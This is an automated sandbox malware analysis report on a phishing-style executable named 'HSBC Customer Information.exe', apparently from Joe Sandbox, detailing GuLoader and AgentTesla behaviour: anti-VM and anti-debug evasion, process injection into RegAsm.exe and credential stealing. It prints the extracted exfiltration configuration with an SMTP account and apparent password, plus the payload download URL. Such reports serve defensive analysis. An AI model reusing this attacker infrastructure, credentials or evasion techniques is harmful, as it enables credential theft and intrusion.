Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Sample Name:HSBC Customer Information.exe
Analysis ID:483511
MD5:448f83467c61e465162daf7cf8d9e88f
SHA1:c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • HSBC Customer Information.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 448F83467C61E465162DAF7CF8D9E88F)
    • RegAsm.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 6140JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 6140JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: HSBC Customer Information.exe.6392.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: HSBC Customer Information.exeVirustotal: Detection: 25%Perma Link
            Source: HSBC Customer Information.exeReversingLabs: Detection: 20%
            Machine Learning detection for sampleShow sources
            Source: HSBC Customer Information.exeJoe Sandbox ML: detected
            Source: HSBC Customer Information.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpString found in binary or memory: http://cthUYD.com
            Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpString found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin
            Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpString found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0
            Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: qrextechnologies.com
            Source: global trafficHTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: HSBC Customer Information.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_004017AC0_2_004017AC
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_0224282A0_2_0224282A
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022428A30_2_022428A3
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02245CAF0_2_02245CAF
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022406C30_2_022406C3
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02240ED20_2_02240ED2
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02240F340_2_02240F34
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022407020_2_02240702
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_0224651E0_2_0224651E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1DD747A025_2_1DD747A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1DD7479025_2_1DD74790
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02245CAF NtAllocateVirtualMemory,0_2_02245CAF
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
            Source: HSBC Customer Information.exeBinary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
            Source: HSBC Customer Information.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: HSBC Customer Information.exeVirustotal: Detection: 25%
            Source: HSBC Customer Information.exeReversingLabs: Detection: 20%
            Source: HSBC Customer Information.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@4/0@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_00407D36 push 0000000Fh; ret 0_2_00407D56
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_004059AE push ecx; ret 0_2_004059AF
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02241E3C push esp; ret 0_2_02241E9D
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_0224460E push ebp; iretd 0_2_022446A9
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02244412 push esp; retf 0_2_02244413
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_0224301F push ebx; iretd 0_2_02243026
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02240A5C push esi; retf 0_2_02240A5D
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022446B5 push ebp; iretd 0_2_022446A9
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02242D18 push ebx; iretd 0_2_02242D52
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02246B6D push ecx; retf 0_2_02246B6E
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022441BE push ebx; iretd 0_2_0224435E
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02241F89 push 0000001Dh; ret 0_2_02241F8B
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_02244192 push ebx; iretd 0_2_0224435E
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022467E2 pushad ; retf 0_2_022467F1
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeCode function: 0_2_022445F1 push ebp; iretd 0_2_022446A9
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeRDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, 000000F3h 0x00000008 xor eax, edx 0x0000000a cmp cx, 00E8h 0x0000000f dec edi 0x00000010 cmp bx, 00DDh 0x00000015 fabs 0x00000017 jmp 00007FC36C4BB470h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FC36C4BB393h 0x00000022 cmp si, 00BBh 0x00000027 mov ebx, F06F76B6h 0x0000002c cmp dh, FFFFFFACh 0x0000002f sub ebx, 2716C148h 0x00000035 cmp ebx, 24h 0x00000038 xor ebx, 6F5BB001h 0x0000003e cmp di, 0030h 0x00000042 punpckldq mm1, mm7 0x00000045 jmp 00007FC36C4BB474h 0x00000047 xor ebx, A643056Fh 0x0000004d cmp ah, 00000026h 0x00000050 cmp cl, FFFFFF90h 0x00000053 rdtsc
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4332Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeWindow / User API: threadDelayed 684Jump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeWindow / User API: threadDelayed 9316Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9139Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 685Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeSystem information queried: ModuleInformationJump to behavior
            Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1000000Jump to behavior
            Source: C:\Users\user\Desktop\HSBC Customer Information.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' Jump to behavior
            Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Source: Yara matchFile source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
